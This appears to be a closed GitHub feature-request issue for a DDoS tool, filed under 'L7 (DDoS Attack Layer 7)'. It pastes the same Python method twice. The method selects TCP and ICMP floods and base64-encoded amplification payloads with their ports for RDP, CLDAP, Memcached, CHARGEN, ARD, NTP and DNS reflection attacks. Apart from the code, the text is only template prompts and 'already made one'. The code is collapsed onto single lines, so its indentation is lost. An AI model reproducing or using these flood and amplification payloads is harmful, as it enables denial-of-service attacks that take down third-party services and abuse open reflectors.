Closed s-b-repo closed 2 months ago
L7 (DDoS Attack Layer 7)
import base64
def select(self, name): self.SENT_FLOOD = self.TCP for key, value in self.methods.items(): if name == key: self.SENT_FLOOD = value elif name == "ICMP": self.SENT_FLOOD = self.ICMP self._target = (self._target[0], 0) elif name == "RDP": self._amp_payload = ( base64.b64decode('AAAAAAAAXwAAAAAAAAB+AAAA'), 3389) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "CLDAP": self._amp_payload = ( base64.b64decode('MCMCA2MgBAAKAQoAAgACAAIAgQAAgY7b2JqZWN0Y2xhc3MwAA=='), 389) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "MEM": self._amp_payload = ( base64.b64decode('AAEAAAAABwBoAGUAbgB0AHMAIABwACAAYQAgAGgAIABlAG4A'), 11211) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "CHAR": self._amp_payload = (base64.b64decode('AQ=='), 19) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "ARD": self._amp_payload = (base64.b64decode('ABQAAAAAAAAA'), 3283) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "NTP": self._amp_payload = (base64.b64decode('FwADMgAAAAA='), 123) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "DNS": self._amp_payload = ( base64.b64decode('RWeABAAABQAAAAAAABzBAAABgAAACYAf/AAAA=='), 53) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp())
already made one
No response
Which section is this feature request for?
L7 (DDoS Attack Layer 7)
Is there an existing issue for this?
Is your feature request related to a problem? Please describe the problem.
import base64
def select(self, name): self.SENT_FLOOD = self.TCP for key, value in self.methods.items(): if name == key: self.SENT_FLOOD = value elif name == "ICMP": self.SENT_FLOOD = self.ICMP self._target = (self._target[0], 0) elif name == "RDP": self._amp_payload = ( base64.b64decode('AAAAAAAAXwAAAAAAAAB+AAAA'), 3389) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "CLDAP": self._amp_payload = ( base64.b64decode('MCMCA2MgBAAKAQoAAgACAAIAgQAAgY7b2JqZWN0Y2xhc3MwAA=='), 389) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "MEM": self._amp_payload = ( base64.b64decode('AAEAAAAABwBoAGUAbgB0AHMAIABwACAAYQAgAGgAIABlAG4A'), 11211) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "CHAR": self._amp_payload = (base64.b64decode('AQ=='), 19) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "ARD": self._amp_payload = (base64.b64decode('ABQAAAAAAAAA'), 3283) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "NTP": self._amp_payload = (base64.b64decode('FwADMgAAAAA='), 123) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) elif name == "DNS": self._amp_payload = ( base64.b64decode('RWeABAAABQAAAAAAABzBAAABgAAACYAf/AAAA=='), 53) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp())
Describe the solution you'd like
already made one
Additional context
No response